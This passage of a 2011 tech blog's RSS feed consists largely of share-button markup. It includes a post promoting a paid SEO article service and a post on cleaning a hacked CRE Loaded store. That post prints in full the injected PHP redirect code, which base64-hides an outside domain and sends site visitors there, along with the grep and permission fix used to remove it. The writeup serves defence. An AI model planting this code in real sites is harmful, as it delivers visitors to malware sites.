			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=Tracking+404+hits+with+google+analytics&amp;link=http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/&amp;notes=I%27ll%20keep%20this%20short%20as%20I%27m%20in%20a%20bit%20of%20a%20rush%20but%20here%20is%20a%20handy%20way%20of%20tracking%20those%20annoying%20404%20errors%20via%20google%20analytics%21%0D%0A%0D%0AFirstly%2C%20ensure%20that%20whenever%20your%20404%20page%20shows%20it%20has%20a%20custom%20title%2C%20something%20along%20the%20lines%20of%20%22Websitename.com%20-%20404%20not%20found%22%20so%20that%20you%20can%20easily%20spot%20th&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/05/09/tracking-404-hits-with-google-analytics/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Purchasing quality Articles &#8211; an experiment</title>
		<link>http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/#comments</comments>
		<pubDate>Thu, 05 May 2011 03:22:47 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[Money Online]]></category>
		<category><![CDATA[quality SEO articles]]></category>
		<category><![CDATA[SEO articles]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=345</guid>
		<description><![CDATA[Ah, the eternal quest for a quality article at reasonable price! I&#8217;m sure if you have been in the online money making game for a while you will have at one point or another considered purchasing some content. Quality content is the corner stone of any great website, not only does it keep your readers [...]]]></description>
			<content:encoded><![CDATA[<p>Ah, the eternal quest for a quality article at reasonable price! I&#8217;m sure if you have been in the online money making game for a while you will have at one point or another considered purchasing some content. Quality content is the corner stone of any great website, not only does it keep your readers intrigued and willing to share amongst their friends, but also google freaking loves it.</p>
<p><a href="http://www.timbystechtalk.com/seoarticlewritingpros">http://www.timbystechtalk.com/seoarticlewritingpros</a></p>
<p>I have been around the block a little when it comes to purchasing content online, with wildly varying results. From cheap article packages with poorly spun content and no real quality to overly expensive, but excellent quality niche articles. The best advice I can give you is that 9 out of 10 times a $2 article is going to be worth $2 (and not worth your time). An excellent middle ground between poor quality outsourced articles and expert niche writers is  <a href="http://www.timbystechtalk.com/seoarticlewritingpros">Seo article writing pros</a>! I have used these guys multiple times and they offer excellent rates for the level of quality in their writing. If you are looking for native English speakers writing your content you should  check them out.</p>
<p style="text-align: center;"><a href="http://www.timbystechtalk.com/wp-content/uploads/2011/05/pet_niche_analytics.jpg"><img class="aligncenter" title="Experiment Analytics" src="http://www.timbystechtalk.com/wp-content/uploads/2011/05/pet_niche_analytics.jpg" alt="" width="500" height="90" /></a></p>
<p><strong>My Experiment</strong></p>
<p>When my friend first introduced me to the SEO article writing pros he told me he had fantastic success with them previously. Not doubting his word on July 5th 2010 I decided to jump in and start an experiment. I chose a small pet niche and had 10 articles written for me focusing on the higher traffic keywords of the niche. Within a week I was handed back 10 excellent quality articles that needed no revisions. It was pretty obvious whomever wrote the article was a native English speaker and they also took some time to educate themselves on the niche they were writing on.</p>
<p>I paired this with some basic off site SEO, I would have spent nothing for the first 4 months of the experiment. I simply let the content sit there. I gave the site some back links from my own related websites to set a foundation. Around November 2010 I started with some link building, just simple directory submissions and nothing more. By the end of January 2011 the site was starting to gain some traffic naturally so I pushed on with some higher quality link building such as article submissions and even used a service once offered by <a href="http://www.timbystechtalk.com/seoarticlewritingpros">Seo Article Writing Pros</a> that they called a &#8220;sniper submission service&#8221;. It is now May 2011 and this site is now bringing in around 90 unique visitors a day all from search engines.</p>
<p>This may not sound that impressive but in less than a year with the help of quality content I have been able to create a website that generates around $1usd per day via adsense with the following investments:</p>
<ul>
<li>10 articles &#8211; $100</li>
<li>Directory submissions &#8211; $50</li>
<li>Article submissions &#8211; $150</li>
</ul>
<p>I spent around 10 hours total over the course of the last few months out sourcing the work and building the website and I have already paid off about half of the costs. By the time a full year has gone by I will be already making solid profit and hopefully have my traffic at least doubled!</p>
<p>The backbone of a good website is good content. I recommend that you take the time to write your own articles about areas of the world that interest you! Realistically however we are not all article writers or we may just find it easier to outsource. I hope my experiment has inspired you to try building a small niche website with quality content and if you are stuck for finding quality workers then give the <a href="../seoarticlewritingpros">Seo Article Writing Pros</a> a chance, you won&#8217;t be disappointed.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=Purchasing+quality+Articles+-+an+experiment&amp;link=http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/&amp;notes=Ah%2C%20the%20eternal%20quest%20for%20a%20quality%20article%20at%20reasonable%20price%21%20I%27m%20sure%20if%20you%20have%20been%20in%20the%20online%20money%20making%20game%20for%20a%20while%20you%20will%20have%20at%20one%20point%20or%20another%20considered%20purchasing%20some%20content.%20Quality%20content%20is%20the%20corner%20stone%20of%20any%20great%20website%2C%20not%20only%20does%20it%20keep%20your%20reader&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/05/05/purchasing-quality-articles-an-experiment/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CRE Reloaded hack redirection clean up</title>
		<link>http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/#comments</comments>
		<pubDate>Wed, 06 Apr 2011 02:20:55 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[cleaning up hacked sites]]></category>
		<category><![CDATA[cre reloaded]]></category>
		<category><![CDATA[hack detection]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=340</guid>
		<description><![CDATA[Just a quick post today! I came across a clients site the other day that had been hacked, no matter what you did you would be redirected away to some spam site that tried to install a virus on your machine. The version of CRE that is running is CRE Loaded6 v6.2 Pro White Label [...]]]></description>
			<content:encoded><![CDATA[<p>Just a quick post today! I came across a clients site the other day that had been hacked, no matter what you did you would be redirected away to some spam site that tried to install a virus on your machine. The version of CRE that is running is CRE Loaded6 v6.2 Pro White Label with patch:12.1 (SP1).</p>
<p>I did the usual things to try and find the hack on the server such as grepping for the URL that was being redirected too but it came up clean (it was a bit of a clever hack).</p>
<p>I had a search around and found a bunch of files used by the hacker including their little shell script that allowed them to upload files and send out mail etc. After removing this and a number of associated files the site no longer redirected however the URL of the site was always appended with &#8220;?rf=1&#8243; which let me know there was still something fishy going on.</p>
<p>I&#8217;m not a unix expert so it took a bit of googling before I found out how to grep properly to escape certain characters. The grep I ran from the root directory was this:</p>
<p>grep -R &#8220;\$_GET['rf']&#8221; *</p>
<p>Note the use of the back slash to escape the dollar sign. This finally showed me some good results! I&#8217;m not sure exactly how the hacker got in but I can tell you that the issue was with poor folder permissions.</p>
<p>This directory had the folder permissions 777 &#8211; /public_html/includes/languages/english</p>
<p>This allowed the hacker to edit every single English language file and insert this piece of code:</p>
<div class="codesnip-container" >
<div class="php codesnip" style="font-family:monospace;"><span class="kw2">&lt;?php</span> <span class="kw1">if</span><span class="br0">&#40;</span><span class="sy0">!</span><a href="http://www.php.net/isset"><span class="kw3">isset</span></a><span class="br0">&#40;</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;engine&#8217;</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="br0">&#123;</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;engine&#8217;</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="nu0">1</span><span class="sy0">;</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;s&#8217;</span><span class="br0">&#93;</span><span class="sy0">=</span><a href="http://www.php.net/base64_decode"><span class="kw3">base64_decode</span></a><span class="br0">&#40;</span><span class="st_h">&#8216;a2hjb2wuY29t&#8217;</span><span class="br0">&#41;</span><span class="sy0">;</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;u&#8217;</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="st_h">&#8216;http://&#8217;</span><span class="sy0">.</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;s&#8217;</span><span class="br0">&#93;</span><span class="sy0">.</span><span class="st_h">&#8216;/page/&#8217;</span><span class="sy0">;</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;r&#8217;</span><span class="br0">&#93;</span><span class="sy0">=</span><span class="st0">&quot;?ref=&quot;</span><span class="sy0">.</span><a href="http://www.php.net/base64_encode"><span class="kw3">base64_encode</span></a><span class="br0">&#40;</span><span class="st_h">&#8216;http://&#8217;</span><span class="sy0">.@</span><span class="re0">$_SERVER</span><span class="br0">&#91;</span><span class="st_h">&#8216;HTTP_HOST&#8217;</span><span class="br0">&#93;</span><span class="sy0">.@</span><span class="re0">$_SERVER</span><span class="br0">&#91;</span><span class="st_h">&#8216;REQUEST_URI&#8217;</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="sy0">;</span>if<span class="br0">&#40;</span><span class="sy0">!</span><a href="http://www.php.net/isset"><span class="kw3">isset</span></a><span class="br0">&#40;</span><span class="re0">$_GET</span><span class="br0">&#91;</span><span class="st_h">&#8216;rf&#8217;</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="br0">&#123;</span><span class="kw1">if</span><span class="br0">&#40;</span><span class="sy0">!@</span><a href="http://www.php.net/headers_sent"><span class="kw3">headers_sent</span></a><span class="br0">&#40;</span><span class="br0">&#41;</span><span class="br0">&#41;</span><span class="br0">&#123;</span><span class="sy0">@</span><a href="http://www.php.net/header"><span class="kw3">header</span></a><span class="br0">&#40;</span><span class="st0">&quot;HTTP/1.1 302 Moved Temporarily&quot;</span><span class="br0">&#41;</span><span class="sy0">;@</span><a href="http://www.php.net/header"><span class="kw3">header</span></a><span class="br0">&#40;</span><span class="st0">&quot;Location: &quot;</span><span class="sy0">.</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;u&#8217;</span><span class="br0">&#93;</span><span class="sy0">.</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;r&#8217;</span><span class="br0">&#93;</span><span class="br0">&#41;</span><span class="sy0">;</span><span class="br0">&#125;</span><span class="kw1">echo</span> <span class="st0">&quot;&lt;h3&gt;Page Moved&lt;/h3&gt;The page you are trying to open has been moved.&lt;br&gt;&lt;br&gt;Use the navigation links on the right of this page, the search box at the top, or the site map link below to find the new location of the page you&#8217;re seeking.&lt;br&gt;&lt;br&gt;Click the link below to follow new url.&lt;br&gt;&lt;br&gt;&lt;a href=<span class="es1">\&quot;</span>&quot;</span><span class="sy0">.</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;u&#8217;</span><span class="br0">&#93;</span><span class="sy0">.</span><span class="st0">&quot;<span class="es1">\&quot;</span>&gt;&quot;</span><span class="sy0">.</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;u&#8217;</span><span class="br0">&#93;</span><span class="sy0">.</span><span class="st0">&quot;&lt;/a&gt;&quot;</span><span class="sy0">;</span>echo <span class="st0">&quot;&lt;script type=<span class="es1">\&quot;</span>text/javascript<span class="es1">\&quot;</span>&gt;document.location = <span class="es1">\&quot;</span>&quot;</span><span class="sy0">.</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;u&#8217;</span><span class="br0">&#93;</span><span class="sy0">.</span><span class="re0">$tf</span><span class="br0">&#91;</span><span class="st_h">&#8216;r&#8217;</span><span class="br0">&#93;</span><span class="sy0">.</span><span class="st0">&quot;<span class="es1">\&quot;</span>;&lt;/script&gt;&quot;</span><span class="sy0">;</span>exit<span class="sy0">;</span><span class="br0">&#125;</span><span class="br0">&#125;</span> <span class="sy1">?&gt;</span></div>
</div>
<p>It took a bit of cleaning up but I ended up running the same grep and editing files until there were no more occurrences across the server. I then went in and tightened up the folder permissions to 755. A few days later now and there are no more issues with redirections and it looks like the site hasn&#8217;t been re-hacked! Time to apply some tighter folder permissions on your CRE installs.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
